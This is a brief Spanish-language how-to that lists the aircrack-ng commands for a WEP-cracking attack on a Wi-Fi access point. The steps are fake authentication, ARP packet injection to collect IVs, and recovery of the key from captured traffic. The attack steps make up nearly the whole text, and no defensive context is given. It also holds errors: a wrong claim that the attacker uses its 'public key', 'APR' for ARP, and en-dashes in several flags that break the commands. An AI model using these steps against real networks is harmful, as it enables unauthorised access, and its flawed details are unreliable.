Fake Authentication Attack
Ataque usado para la obtención de contraseña. El atacante se autentica falsamente en el AP usando su clave pública sin necesidad de conocer la clave WEP. Sirve para capturar IVs para otros ataques.
Capturar tráfico con Airodump-ng
sudo airodump-ng --write traffic_file --bssid <MAC_AP> --channel <channel_AP> <wifi_interface>
En paralelo, ejecutar MACchanger para conocer la dirección MAC de la interfaz de red utilizada
macchanger --show <wifi_interface>
Ejecutar ataque fakeauth con Aireplay-ng
sudo aireplay-ng --fakeauth 0 –e <NAME_AP> –b <MAC_AP> -h <MAC_wifi_interface> <wifi_interface>
Ejecutar ataque interactive con Aireplay-ng para inyectar paquetes APR genéricos a la red (0841 es un valor común usado para inyectar este tipo de paquetes)
sudo aireplay-ng --interactive –p 0841 –c FF:FF:FF:FF:FF:FF –b <MAC_AP> -h <MAC_wifi_interface> <wifi_interface>
Crackear contraseña con Aircrack-ng desde fichero con tráfico capturado en Airodump-ng
sudo aircrack-ng –b <MAC_AP> traffic_file.cap